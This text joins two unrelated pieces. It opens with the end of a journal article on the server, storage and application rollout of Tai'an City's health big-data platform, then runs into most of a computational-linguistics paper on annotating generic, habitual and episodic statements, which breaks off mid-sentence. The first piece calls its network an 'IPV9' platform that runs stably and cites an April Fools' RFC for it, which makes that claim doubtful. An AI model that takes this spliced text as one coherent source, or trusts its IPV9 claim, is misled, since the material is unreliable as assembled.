Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 22 control devices, which mainly provide security auditing and vulnerability scanning andother protection functions for the network. IV. DESIGN OF SYSTEM HARDWARE ARCHITECTURE The system is equipped with Huawei key business server minicomputer, which is mainly used in HIS system. It gives full play to the characteristics of strong processing capacity and high reliability of the minicomputer to ensure the normal operation of the hospital's daily business for 24 hours. The system is equipped with Huawei high-performance data server, which serves as the city's population health records database to ensure the security of these important data. The high-performance generic server runs the LIS system, supply chain system, PACS system, medical business collaboration, Internet applications, and other applications. The cloud mode dynamically adjusts the computing resources of the server according to the running status of the service. Each virtual machine can be used as a backup. If a hardware server fails, the service will not be affected. The hardware architecture of the system is shown in figure 6. Figure 6. Topology diagram of health Tai’an big data ecological domain equipment. According to the outpatient volume of all levels of hospitals within Tai’an region, the available storage capacity of healthy Tai’an big data ecological domain is 202.5T, which can meet the business needs in the next 3 to 5 years. The storage portion consists of Huawei OceanStor6800 V3 and Huawei International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 23 OceanStor5300 V3 virtualized Shared storage disk array. The system plans HUAWEIRH2288HV3, (CPU E5-2620V4, 16G memory 600G hard disk) server, as a silver enterprise server, deploys two independent physical machine servers. System antivirus virus database upgrade server, and system antivirus virus database requires independent physical server. V. SYSTEM IMPLEMENTATION Tai’an City health big data ecological domain designed in accordance with the above framework system, it has completed the overall planning of nearly 300 platforms and products in 8 categories, including basic platform, medical service, health service, healthy family, business system, benefit people service, business supervision, emerging technology since its construction in 2017. The system has completed the construction of all basic platforms, including platform standard management system, platform basic service, data exchange service, data resource service, information system integration platform, platform operation and maintenance system, platform security system. It has completed the construction of the information system of all primary medical institutions, including cloud HIS, cloud LIS, cloud PACS, cloud EMR and so on. Some health services have been completed, including basic public health services and family doctor services. It has completed the construction of some business collaboration systems, including medical group/medical association/medical community/specialist alliance system, health ID card management system, health record access system, two-way referral system, remote consultation system, imaging center system. It has completed the construction of some beneficial services, including health Tai’an website/app, Internet hospital, prescription sharing platform, pharmacy purchasing, sales and storage management system, online drug purchase management system, etc. It has completed the construction of some business supervision system, including medical and health supervision system, financial fund supervision system, medical insurance control system, etc. The detail is as follows: Figure 7. Application system module map In the above system, the financial capital clearing platform has been used in various medical and health unit in the whole city. The Fourth People's Hospital of Tai'an City, Tai'an Traditional Chinese Medicine Hospital, and Wangzhuang Town Health Center of Feicheng City of medical informatization and Internet + application have been comprehensively. It has been fully launched and stable, and has been highly praised by visiting experts. The Fourth People's Hospital of Tai'an City, the Wangzhuang Town Health Center of Feicheng City is applying for a typical case of the national universal medical health information platform. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 24 The overall platform has achieved good application results, and the operation based on IPV9 network platform is stable and reliable. REFERENCE [1] Xie Jianping etc. Method of using whole digital code to assign address for computer [P].US: 8082365, 2011.12. [2] Xie Jianping, Xu Dongmei, etc.Digital domain name specification. SJ/T11271-2002, 2002.07. [3] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [4] Radio frequency identification tag information query service network architecture technical specification. SJ/T11606-2016, 2016. 06 [5] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [6] Notice of the Shandong provincial government on printing and distributing the work plan for the promotion of the construction of medical complex in Shandong province, issued by Shandong administrative office. No.51 [2017] [7] Notice on printing and distributing the implementation plan for promoting the construction of Tai’an City medical consortium, issued by Thailand administrative office. No.14 [2017] [8] Opinions of the Shandong provincial government on the implementation of document. No.47 [2016] of The State Council on promoting and standardizing the development of the application of big data in health care. No.55 [2017]. Issued by the Council of Shandong province. [9] Notice of the national health and family planning commission on printing and distributing guidelines on the application of hospital information platform. No. 1110 of the planning letter of the national health office [2016] [10] Notice of Shandong provincial health and family planning commission on the implementation of contract service for family doctors. No.6 [2018] [11] Notice on the 100-day action of Internet + medical and health care for the benefit of the people. No. 2019 [2018] [12] Notice of the State Council on printing and distributing the implementation and assessment program of healthy China action organization. No. 32 [2019] work_qdsct3peezb6jgqd7q4pwkpcji ---- Decomposing Generalization Models of Generic, Habitual, and Episodic Statements Venkata Govindarajan University of Rochester Benjamin Van Durme Johns Hopkins University Aaron Steven White University of Rochester Abstract We present a novel semantic framework for modeling linguistic expressions of generalization— generic, habitual, and episodic statements—as combinations of simple, real-valued referen- tial properties of predicates and their argu- ments. We use this framework to construct a dataset covering the entirety of the Universal Dependencies English Web Treebank. We use this dataset to probe the efficacy of type-level and token-level information—including hand- engineered features and static (GloVe) and contextual (ELMo) word embeddings—for predicting expressions of generalization. 1 Introduction Natural language allows us to convey not only information about particular individuals and events, as in Example (1), but also generalizations about those individuals and events, as in (2). (1) a. Mary ate oatmeal for breakfast today. b. The students completed their assignments. (2) a. Mary eats oatmeal for breakfast. b. The students always complete their assign- ments on time. This capacity for expressing generalization is extremely flexible—allowing for generalizations about the kinds of events that particular individuals are habitually involved in, as in (2), as well as characterizations about kinds of things, as in (3). (3) a. Bishops move diagonally. b. Soap is used to remove dirt. Such distinctions between episodic statements (1), on the one hand, and habitual (2) and generic (or characterizing) statements (3), on the other, have a long history in both the linguistics and artificial intelligence literatures (see Carlson, 2011; Maienborn et al., 2011; Leslie and Lerner, 2016). Nevertheless, few modern semantic parsers make a systematic distinction (cf. Abzianidze and Bos, 2017). This is problematic, because the ability to accurately capture different modes of generaliza- tion is likely key to building systems with robust common sense reasoning (Zhang et al., 2017a; Bauer et al., 2018): Such systems need some source for general knowledge about the world (McCarthy, 1960, 1980, 1986; Minsky, 1974; Schank and Abelson, 1975; Hobbs et al., 1987; Reiter, 1987) and natural language text seems like a prime candidate. It is also surprising, because there is no dearth of data relevant to linguistic expressions of generalization (Doddington et al., 2004; Cybulska and Vossen, 2014b; Friedrich et al., 2015). One obstacle to further progress on general- ization is that current frameworks tend to take standard descriptive categories as sharp classes— for example, EPISODIC, GENERIC, HABITUAL for state- ments and KIND, INDIVIDUAL for noun phrases. This may seem reasonable for sentences like (1a), where Mary clearly refers to a particular individual, or (3a), where Bishops clearly refers to a kind; but natural text is less forgiving (Grimm, 2014, 2016, 2018). Consider the under- lined arguments in (4): Do they refer to kinds or individuals? (4) a. I will manage client expectations. b. The atmosphere may not be for everyone. c. Thanks again for great customer service! To remedy this, we propose a novel frame- work for capturing linguistic expressions of generalization. Taking inspiration from decompo- sitional semantics (Reisinger et al., 2015; White et al., 2016), we suggest that linguistic expressions 501 Transactions of the Association for Computational Linguistics, vol. 7, pp. 501–517, 2019. https://doi.org/10.1162/tacl a 00285 Action Editor: Christopher Potts. Submission batch: 3/2019; Revision batch: 6/2019; Published 9/2019. c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 https://doi.org/10.1162/tacl_a_00285 of generalization should be captured in a contin- uous multi-label system, rather than a multi-class system. We do this by decomposing categories such as EPISODIC, HABITUAL, and GENERIC into simple referential properties of predicates and their argu- ments. Using this framework (§3), we develop an annotation protocol, which we validate (§4) and compare against previous frameworks (§5). We then deploy this framework (§6) to construct a new large-scale dataset of annotations covering the entire Universal Dependencies (De Marneffe et al., 2014; Nivre et al., 2015) English Web Treebank (UD-EWT; Bies et al., 2012; Silveira et al., 2014)—yielding the Universal Decompo- sitional Semantics-Genericity (UDS-G) dataset.1 Through exploratory analysis of this dataset, we demonstrate that this multi-label framework is well-motivated (§7). We then present models for predicting expressions of linguistic general- ization that combine hand-engineered type and token-level features with static and contextual learned representations (§8). We find that (i) referential properties of arguments are easier to predict than those of predicates; and that (ii) contextual learned representations contain most of the relevant information for both arguments and predicates (§9). 2 Background Most existing annotation frameworks aim to cap- ture expressions of linguistic generalization using multi-class annotation schemes. We argue that this reliance on multi-class annotation schemes is problematic on the basis of descriptive and theoretical work in the linguistics literature. One of the earliest frameworks explicitly aimed at capturing expressions of linguistic general- ization was developed under the ACE-2 program (Mitchell et al., 2003; Doddington et al., 2004, and see Reiter and Frank, 2010). This framework associates entity mentions with discrete labels for whether they refer to a specific member of the set in question (SPECIFIC) or any member of the set in question (GENERIC). The ACE-2005 Multilingual Training Corpus (Walker et al., 2006) extends these annotation guidelines, providing two additional classes: (i) negatively quantified entries (NEG) for referring to empty sets and (ii) 1Data, code, protocol implementation, and task instruc- tions provided to annotators are available at decomp.io. underspecified entries (USP), where the referent is ambiguous between GENERIC and SPECIFIC. The existence of the USP label already portends an issue with multi-class annotation schemes, which have no way of capturing the well-known phenomena of taxonomic reference (see Carlson and Pelletier, 1995, and references therein), abstract/event reference (Grimm, 2014, 2016, 2018), and weak definites (Carlson et al., 2006). For example, wines in (5) refers to particular kinds of wine; service in (6) refers to an abstract entity/event that could be construed as both particular-referring, in that it is the service at a specific restaurant, and kind-referring, in that it encompasses all service events at that restaurant; and bus in (7) refers to potentially multiple distinct buses that are grouped into a kind by the fact that they drive a particular line. (5) That vintner makes three different wines. (6) The service at that restaurant is excellent. (7) That bureaucrat takes the 90 bus to work. This deficit is remedied to some extent in the ARRAU (Poesio et al., 2018, and see Mathew, 2009; Louis and Nenkova, 2011) and ECB+ (Cybulska and Vossen, 2014a,b) corpora. The ARRAU corpus is mainly intended to capture anaphora resolution, but following the GNOME guidelines (Poesio, 2004), it also annotates entity mentions for a GENERIC attribute, sensitive to whether the mention is in the scope of a relevant semantic operator (e.g., a conditional or quantifier) and whether the nominal refers to a type of object whose genericity is left underspecified, such as a substance. The ECB+ corpus is an extension of the EventCorefBank (ECB; Bejan and Harabagiu, 2010; Lee et al., 2012), which annotates Google News texts for event coreference in accordance with the TimeML specification (Pustejovsky et al., 2003), and is an improvement in the sense that, in addition to entity mentions, event mentions may be labeled with a GENERIC class. The ECB+ approach is useful, since episodic, habitual, and generic statements can straightfor- wardly be described using combinations of event and entity mention labels. For example, in ECB+, episodic statements involve only non-generic entity and event mentions; habitual statements involve a generic event mention and at least one 502 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 http://decomp.io non-generic entity mention; and generic state- ments involve generic event mentions and at least one generic entity mention. This demonstrates the strength of decomposing statements into proper- ties of the events and entities they describe; but there remain difficult issues arising from the fact that the decomposition does not go far enough. One is that, like ACE-2/2005 and ARRAU, ECB+ does not make it possible to capture taxonomic and abstract reference or weak definites; another is that, because ECB+ treats generics as mutu- ally exclusive from other event classes, it is not possible to capture that events and states in those classes can themselves be particular or generic. This is well known for different classes of events, such as those determined by a predicate’s lex- ical aspect (Vendler, 1957); but it is likely also important for distinguishing more particular stage- level properties (e.g., availability (8)) from more generic individual-level properties (e.g., strength (9)) (Carlson, 1977). (8) Those firemen are available. (9) Those firemen are strong. This situation is improved upon in the Richer Event Descriptions (RED; O’Gorman et al., 2016) and Situation Entities (SitEnt; Friedrich and Palmer, 2014a,b; Friedrich et al., 2015; Friedrich and Pinkal, 2015b,a; Friedrich et al., 2016) frame- works, which annotate both NPs and entire clauses for genericity. In particular, SitEnt, which is used to annotate MASC (Ide et al., 2010) and Wikipedia, has the nice property that it rec- ognizes the existence of abstract entities and lexical aspectual class of clauses’ main verbs, along with habituality and genericity. This is use- ful because, in addition to decomposing state- ments using the genericity of the main referent and event, this framework recognizes that lexical as- pect is an independent phenomenon. In practice, however, the annotations produced by this frame- work are mapped into a multi-class scheme contain- ing only the high-level GENERIC-HABITUAL-EPISODIC distinction—alongside a conceptually indepen- dent distinction among illocutionary acts. A potential argument in favor of mapping into a multi-class scheme is that, if it is sufficiently elaborated, the relevant decomposition may be recoverable. But regardless of such an elaboration, uncertainty about which class any particular entity or event falls into cannot be ignored. Some ex- amples may just not have categorically correct answers; and even if they do, annotator uncertainty and bias may obscure them. To account for this, we develop a novel annotation framework that both (i) explicitly captures annotator confidence about the different referential properties discussed above and (ii) attempts to correct for annotator bias using standard psycholinguistic methods. 3 Annotation Framework We divide our framework into two protocols—the argument and predicate protocols—that probe properties of individuals and situations (i.e., events or states) referred to in a clause. Drawing inspiration from prior work in decompositional semantics (White et al., 2016), a crucial aspect of our framework is that (i) multiple properties can be simultaneously true for a particular individual or situation (event or state); and (ii) we explicitly collect confidence ratings for each property. This makes our framework highly extensible, because further properties can be added without breaking a strict multi-class ontology. Drawing inspiration from the prior literature on generalization discussed in §1 and §2, we focus on properties that lie along three main axes: whether a predicate or its arguments refer to (i) instantiated or spatiotemporally delimited (i.e., particular) situations or individuals; (ii) classes of situations (i.e., hypothetical situations) or kinds of individuals; and/or (iii) intangible (i.e., abstract concepts or stative situations). This choice of axes is aimed at allowing our framework to capture not only the standard EPISODIC-HABITUAL-GENERIC distinction, but also phenomena that do not fit neatly into this dis- tinction, such as taxonomic reference, abstract reference, and weak definites. The idea here is similar to prior decompositional semantics work on semantic protoroles (Reisinger et al., 2015; White et al., 2016, 2017), which associates categories like AGENT or PATIENT with sets of more basic properties, such as volitionality, causation, change-of-state, and so forth, and is similarly inspired by classic theoretical work (Dowty, 1991). In our framework, prototypical episodics, habit- uals, and generics correspond to sets of properties that the referents of a clause’s head predicate and arguments have—namely, clausal categories are built up from properties of the predicates that head 503 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Figure 1: Examples of argument protocol (top) and predicate protocol (bottom). them along with those predicates’ arguments. For instance, prototypical episodic statements, like those in (1), have arguments that only refer to particular, non-kind, non-abstract individuals and a predicate that refers to a particular event or (possibly) state; prototypical habitual statements, like those in (2) have arguments that refer to at least one particular, non-kind, non-abstract individual and a predicate that refers to a non-particular, dynamic event; and prototypical generics, like those in (3), have arguments that only refer to kinds of individuals and a predicate that refers to non-particular situations. It is important to note that these are all proto- typical properties of episodic, habitual, or generic statements, in the same way that volitionality is a prototypical property of agents and change-of- state is a prototypical property of patients. That is, our framework explicitly allows for bleed between categories because it only commits to the referen- tial properties, not the categories themselves. It is this ambivalence toward sharp categories that also allows our framework to capture phenomena that fall outside the bounds of the standard three-way distinction. For instance, taxonomic reference, as in (5), and weak definites, as in (7), prototypically involve an argument being both particular- and kind-referring; stage-level properties, as in (8), prototypically involve particular, non-dynamic situations, while individual-level properties, as in (9), prototypically involve non-particular, non- dynamic situations. Figure 1 shows examples of the argument pro- tocol (top) and predicate protocol (bottom), whose implementation is based on the event factuality annotation protocol described by White et al. (2016) and Rudinger et al. (2018). Annotators are presented with a sentence with one or many words highlighted, followed by statements pertain- ing to the highlighted words in the context of the sentence. They are then asked to fill in the statement with a binary response saying whether it does or does not hold and to give their confidence on a 5-point scale—not at all confident (1), not very confident (2), somewhat confident (3), very confident (4), and totally confident (5). 4 Framework Validation To demonstrate the efficacy of our framework for use in bulk annotation (reported in §6), we conduct a validation study on both our predicate and argument protocols. The aim of these studies is to establish that annotators display reasonable agreement when annotating for the properties in each protocol, relative to their reported confi- dence. We expect that, the more confident both annotators are in their annotation, the more likely it should be that annotators agree on those annotations. To ensure that the findings from our validation studies generalize to the bulk annotation setting, we simulate the bulk setting as closely as pos- sible: (i) randomly sampling arguments and pre- dicates for annotation from the same corpus we conduct the bulk annotation on UD-EWT; and (ii) allowing annotators to do as many or as few annotations as they would like. This design makes standard measures of interannotator agreement somewhat difficult to accurately compute, because different pairs of annotators may annotate only a small number of overlapping items (arguments/ predicates), so we turn to standard statistical methods from psycholinguistics to assist in esti- mation of interannotator agreement. Predicate and argument extraction We ex- tracted predicates and their arguments from the gold UD parses from UD-EWT using PredPatt (White et al., 2016; Zhang et al., 2017b). From the UD-EWT training set, we then randomly sampled 100 arguments from those headed by a DET, NUM, NOUN, PROPN, or PRON and 100 predicates from 504 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 those headed by a ADJ, NOUN, NUM, DET, PROPN, PRON, VERB, or AUX. Annotators A total of 44 annotators were re- cruited from Amazon Mechanical Turk to anno- tate arguments; and 50 annotators were recruited to annotate predicates. In both cases, arguments and predicates were presented in batches of 10, with each predicate and argument annotated by 10 annotators. Confidence normalization Because different annotators use the confidence scale in different ways (e.g., some annotators use all five options while others only ever respond with totally confident (5)) we normalize the confidence ratings for each property using a standard ordinal scale normalization technique known as ridit scoring (Agresti, 2003). In ridit scoring, ordinal labels are mapped to (0, 1) using the empirical cumulative distribution function of the ratings given by each annotator. Specifically, for the responses y(a) given by annotator a, ridity(a) ( y (a) i ) = ECDFy(a) ( y (a) i − 1 ) + 0.5 × ECDFy(a) ( y (a) i ) . Ridit scoring has the effect of reweighting the importance of a scale label based on the frequency with which it is used. For example, insofar as an annotator rarely uses extreme values, such as not at all confident or totally confident, the annotator is likely signaling very low or very high confidence, respectively, when they are used; and insofar as an annotator often uses extreme values, the annotator is likely not signaling particularly low or particularly high confidence. Interannotator Agreement (IAA) Common IAA statistics, such as Cohen’s or Fleiss’ κ, rely on the ability to compute both an expected agreement pe and an observed agreement po, with κ ≡ po−pe1−pe . Such a computation is relatively straightforward when a small number of annotators annotate many items, but when many annotators each annotate a small number of items pairwise, pe and po can be difficult to estimate accurately, especially for annotators that only annotate a few items total. Further, there is no standard way to incorporate confidence ratings, like the ones we collect, into these IAA measures. To overcome these obstacles, we use a com- bination of mixed and random effects models (Gelman and Hill, 2014), which are extremely common in the analysis of psycholinguistic data Property β̂0 σ̂ann σ̂item A rg um en t Is.Particular 0.49 1.15 1.76 Is.Kind −0.31 1.23 1.34 Is.Abstract −1.29 1.27 1.70 P re di ca te Is.Particular 0.98 0.91 0.72 Is.Dynamic 0.24 0.82 0.59 Is.Hypothetical −0.78 1.24 0.90 Table 1: Bias (log-odds) for answering true. (Baayen, 2008), to estimate pe and po for each property. The basic idea behind using these models is to allow our estimates of pe and po to be sensi- tive to the number of items annotators anno- tated as well as how annotators’ confidence relates to agreement. To estimate pe for each property, we fit a random effects logistic regression to the binary responses for that property, with random intercepts for both annotator and item. The fixed intercept estimate β̂0 for this model is an estimate of the log-odds that the average annotator would answer true on that property for the average item; and the random intercepts give the distribution of actual annotator (σ̂ann) or item (σ̂item) biases. Table 1 gives the estimates for each property. We note a substantial amount of variability in the bias different annotators have for answering true on many of these properties. This variability is evidenced by the fact that σ̂ann and σ̂item are similar across properties, and it suggests the need to adjust for annotator biases when analyzing these data, which we do both here and for our bulk annotation. To compute pe from these estimates, we use a parametric bootstrap. On each replicate, we sample annotator biases b1, b2 independently from N(β̂0, σ̂ann), then compute the expected probability of random agreement in the standard way: π1π2 + (1 − π1)(1 − π2), where πi = logit−1(bi). We compute the mean across 9,999 such replicates to obtain pe, shown in Table 2. To estimate po for each property in a way that takes annotator confidence into account, we first compute, for each pair of annotators, each item they both annotated, and each property they annotated that item on, whether or not they agree in their annotation. We then fit separate mixed effects logistic regressions for each property to this agreement variable, with a fixed intercept β0 and slope βconf for the product of the annotators’ 505 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Property pe κlow κhigh A rg um en t Is.Particular 0.52 0.21 0.77 Is.Kind 0.51 0.12 0.51 Is. Abstract 0.61 0.17 0.80 P re di ca te Is.Particular 0.58 −0.11 0.54 Is.Dynamic 0.51 −0.02 0.22 Is.Hypothetical 0.54 −0.04 0.60 Table 2: Interannotator agreement scores. confidence for that item and random intercepts for both annotator and item.2 We find, for all properties, that there is a reliable increase (i.e., a positive β̂conf) in agreement as annotators’ confidence ratings go up (ps < 0.001). This corroborates our prediction that annotators should have higher agreement for things they are confident about. It also suggests the need to incorporate confidence ratings into the annotations our models are trained on, which we do in our normalization of the bulk annotation responses. From the fixed effects, we can obtain an esti- mate of the probability of agreement for the average pair of annotators at each confidence level between 0 and 1. We compute two versions of κ based on such estimates: κlow, which corresponds to 0 confidence for at least one annotator in a pair, and κhigh, which corresponds to perfect confidence for both. Table 2 shows these κ estimates. As implied by reliably positive β̂confs, we see that κhigh is greater than κlow for all properties. Further, with the exception of DYNAMIC, κhigh is generally comparable to the κ estimates reported in annotations by trained annotators using a multi-class framework. For instance, compare the metrics in Table 2 to κann in Table 3 (see §5 for details), which gives the Fleiss’ κ metric for clause types in the SitEnt dataset (Friedrich et al., 2016). 5 Comparison to Standard Ontology To demonstrate that our framework subsumes standard distinctions (e.g., EPISODIC v. HABITUAL v. GENERIC) we conduct a study comparing anno- tations assigned under our multi-label framework to those assigned under a framework that recog- nizes such multi-class distinctions. We choose the the SitEnt framework for this comparison, because 2We use the product of annotator confidences because it is large when both annotators have high confidence and small when either annotator has low confidence and always remains between 0 (lowest confidence) and 1 (highest confidence). Clause type P R F κmod κann EVENTIVE 0.68 0.55 0.61 0.49 0.74 STATIVE 0.61 0.59 0.60 0.47 0.67 HABITUAL 0.49 0.52 0.50 0.33 0.43 GENERIC 0.66 0.77 0.71 0.61 0.68 Table 3: Predictability of standard ontology using our property set in a kernelized support vector classifier. it assumes a categorical distinction between GENERIC, HABITUAL (their GENERALIZING), EPISODIC (their EVENTIVE), and STATIVE clauses (Friedrich and Palmer, 2014a,b; Friedrich et al., 2015; Friedrich and Pinkal, 2015b,a; Friedrich et al., 2016).3 SitEnt is also a useful comparison because it was constructed by highly trained annotators who had access to the entire document containing the clause being annotated, thus allowing us to assess both how much it matters that we use only very lightly trained annotators and do not provide document context. Predicate and argument extraction For each of GENERIC, HABITUAL, STATIVE, and EVENTIVE, we randomly sample 100 clauses from SitEnt such that (i) that clause’s gold annotation has that category; and (ii) all SitEnt annotators agreed on that annotation. We annotate the mainRefer- ent of these clauses (as defined by SitEnt) in our argument protocol and the mainVerb in our predicate protocol, providing annotators only the sentence containing the clause. Annotators 42 annotators were recruited from Amazon Mechanical Turk to annotate arguments, and 45 annotators were recruited to annotate predicates—both in batches of 10, with each predicate and argument annotated by 5 annotators. Annotation normalization As noted in §4, different annotators use the confidence scale dif- ferently and have different biases for responding true or false on different properties (see Table 1). To adjust for these biases, we construct a nor- malized score for each predicate and argument using mixed effects logistic regressions. These mixed effects models all had (i) a hinge loss with margin set to the normalized confidence rating; (ii) fixed effects for property (PARTICULAR, 3SitEnt additionally assumes three other classes, con- trasting with the four above: IMPERATIVE, QUESTION, and REPORT. We ignore clauses labeled with these categories. 506 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 KIND, and ABSTRACT for arguments; PARTICULAR, HYPOTHETICAL, and DYNAMIC for predicates) token, and their interaction; and (iii) by-annotator ran- dom intercepts and random slopes for property with diagonal covariance matrices. The rationale behind (i) is that true should be associated with positive values; false should be associated with negative values; and the confidence rating should control how far from zero the normalized rating is, adjusting for the biases of annotators that responded to a particular item. The resulting re- sponse scale is analogous to current approaches to event factuality annotation (Lee et al., 2015; Stanovsky et al., 2017; Rudinger et al., 2018). We obtain a normalized score from these models by setting the Best Linear Unbiased Pre- dictors for the by-annotator random effects to zero and using the Best Linear Unbiased Estimators for the fixed effects to obtain a real-valued label for each token on each property. This procedure amounts to estimating a label for each property and each token based on the ‘‘average annotator.’’ Quantitative comparison To compare our anno- tations to the gold situation entity types from SitEnt, we train a support vector classifier with a radial basis function kernel to predict the situation entity type of each clause on the basis of the normalized argument property annotations for that clause’s mainReferent and the nor- malized predicate property annotations for that clause’s mainVerb. The hyperparameters for this support vector classifier were selected using exhaustive grid search over the regularization parameter λ ∈ {1, 10, 100, 1000} and bandwidth σ ∈ { 10−2, 10−3, 10−4, 10−5 } in a 5-fold cross- validation (CV). This 5-fold CV was nested within a 10-fold CV, from which we calculate metrics. Table 3 reports the precision, recall, and F-score computed using the held-out set in each fold of the 10-fold CV. For purposes of comparison, it also gives the Fleiss’ κ reported by Friedrich et al. (2016) for each property (κann) as well as Cohen’s κ between our model predictions on the held-out folds and the gold SitEnt annotations (κmod). One way to think about κmod is that it tells us what agreement we would expect if we used our model as an annotator instead of highly trained humans. We see that our model’s agreement (κmod) tracks interannotator agreement (κann) surprisingly well. Indeed, in some cases, such as for GENERIC, our model’s agreement is within a few points of Figure 2: Mean property value for each clause type. interannotator agreement. This pattern is sur- prising, because our model is based on annota- tions by very lightly trained annotators who have access to very limited context compared with the annotators of SitEnt, who receive the entire doc- ument in which a clause is found. Indeed, our model has access to even less context than it could otherwise have on the basis of our framework, since we only annotate one of the potentially many arguments occurring in a clause; thus, the metrics in Table 3 are likely somewhat conser- vative. This pattern may further suggest that, although having extra context for annotating com- plex semantic phenomena is always preferable, we still capture useful information by annotating only isolated sentences. Qualitative comparison Figure 2 shows the mean normalized value for each property in our framework broken out by clause type. As ex- pected, we see that episodics tend to have particular-referring arguments and predicates, whereas generics tend to have kind-referring arguments and non-particular predicates. Also as expected, episodics and habituals tend to refer to situations that are more dynamic than statives and generics. But although it makes sense that generics would be, on average, near zero for dynamicity—since generics can be about both dynamic and non-dynamic situations—it is less clear why statives are not more negative. This pattern may arise in some way from the fact that 507 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 there is relatively lower agreement on dynamicity, as noted in §4. 6 Bulk Annotation We use our annotation framework to collect anno- tations of predicates and arguments on UD-EWT using the PredPatt system—thus yielding the Uni- versal Decompositional Semantics–Genericity (UDS-G) dataset. Using UD-EWT in conjunction with PredPatt has two main advantages over other similar corpora: (i) UD-EWT contains text from multiple genres—not just newswire—with gold standard Universal Dependency parses; and (ii) there are now a wide variety of other semantic annotations on top of UD-EWT that use the PredPatt standard (White et al., 2016; Rudinger et al., 2018; Vashishtha et al., 2019). Predicate and argument extraction PredPatt identifies 34,025 predicates and 56,246 arguments of those predicates from 16,622 sentences. Based on analysis of the data from our validation study (§4) and other pilot experiments (not reported here), we developed a set of heuristics for filtering certain tokens that PredPatt identifies as predicates and arguments, either because we found that there was little variability in the label assigned to particular subsets of tokens—for example, pro- nominal arguments (such as I, we, he, she, etc.) are almost always labeled particular, non-kind, and non-abstract (with the exception of you and they, which can be kind-referring)—or because it is not generally possible to answer questions about those tokens (e.g., adverbial predicates are excluded). Based on these filtering heuristics, we retain 37,146 arguments and 33,114 predicates for annotation. Table 4 compares these numbers against the resources described in §2. Annotators We recruited 482 annotators from Amazon Mechanical Turk to annotate arguments, and 438 annotators were recruited to annotate predicates. Arguments and predicates in the UD- EWT validation and test sets were annotated by three annotators each; and those in the UD- EWT train set were annotated by one each. All annotations were performed in batches of 10. Annotation normalization We use the anno- tation normalization procedure described in §5, fit separately to our train and development splits, on the one hand, and our test split, on the other. Corpus Level Scheme Size ACE-2 NP multi-class 40,106 ACE-2005 ECB+ Arg. multi-class 12,540 Pred. multi-class 14,884 CFD NP multi-class 3,422 Matthew et al clause multi-class 1,052 ARRAU NP multi-class 91,933 SitEnt Topic multi-class 40,940 Clause multi-class RED Arg. multi-class 10,319 Pred. multi-class 8,731 UDS-G Arg. multi-label 37,146 Pred. multi-label 33,114 Table 4: Survey of genericity annotated corpora for English, including our new corpus (in bold). 7 Exploratory Analysis Before presenting models for predicting our prop- erties, we conduct an exploratory analysis to dem- onstrate that the properties of the dataset relate to other token- and type-level semantic properties in intuitive ways. Figure 3 plots the normalized ratings for the argument (left) and predicate (right) protocols. Each point corresponds to a token and the density plots visualize the number of points in a region. Arguments We see that arguments have a slight tendency (Pearson correlation ρ=−0.33) to refer to either a kind or a particular—for example, place in (10) falls in the lower right quadrant (particular- referring) and transportation in (11) falls in the upper left quadrant (kind-referring)—though there are a not insignificant number of arguments that refer to something that is both—for example, registration in (12) falls in the upper right quadrant. (10) I think this place is probably really great especially judging by the reviews on here. (11) What made it perfect was that they offered transportation so that[...] (12) Some places do the registration right at the hospital[...] We also see that there is a slight tendency for arguments that are neither particular-referring (ρ = −0.28) nor kind-referring (ρ = −0.11) to be abstract-referring—for example, power in (13) 508 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Figure 3: Distribution of normalized annotations in argument (left) and predicate (right) protocols. falls in the lower left quadrant (only abstract- referring)—but that there are some arguments that refer to abstract particulars and some that refer to abstract kinds—for example, both reputation (14) and argument (15) are abstract, but reputation falls in the lower right quadrant, while argument falls in the upper left. (13) Power be where power lies. (14) Meanwhile, his reputation seems to be improving, although Bangs noted a ‘‘pretty interesting social dynamic.’’ (15) The Pew researchers tried to transcend the economic argument. Predicates We see that there is effectively no tendency (ρ = 0.00) for predicates that refer to particular situations to refer to dynamic events— for example, faxed in (16) falls in the upper right quadrant (particular- and dynamic-referring), while available in (17) falls in the lower right quadrant (particular- and non-dynamic-referring). (16) I have faxed to you the form of Bond[...] (17) is gare montparnasse storage still available? But we do see that there is a slight tendency (ρ = −0.25) for predicates that are hypothetical- referring not to be particular-referring—for ex- ample, knows in (18a) and do in (18b) are hypotheticals in the lower left. (18) a. Who knows what the future might hold, and it might be expensive? b. I have tryed to give him water but he wont take it...what should i do? 8 Models We consider two forms of predicate and argument representations to predict the three attributes in our framework: hand-engineered features and learned features. For both, we contrast both type-level information and token-level information. Hand-engineered features We consider five sets of type-level hand-engineered features. 1. Concreteness Concreteness ratings for root argument lemmas in the argument protocol from the concreteness database (Brysbaert et al., 2014) and the mean, maximum, and minimum concreteness rating of a predicate’s arguments in the predicate protocol. 2. Eventivity Eventivity and stativity ratings for the root predicate lemma in the predicate protocol and the predicate head of the root argument in the argument protocol from the LCS database (Dorr, 2001). 3. VerbNet Verb classes from VerbNet (Schuler, 2005) for root predicate lemmas. 4. FrameNet Frames evoked by root predicate lemmas in the predicate protocol and for both 509 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 the root argument lemma and its predicate head in the argument protocol from FrameNet (Baker et al., 1998). 5. WordNet The union of WordNet (Fellbaum, 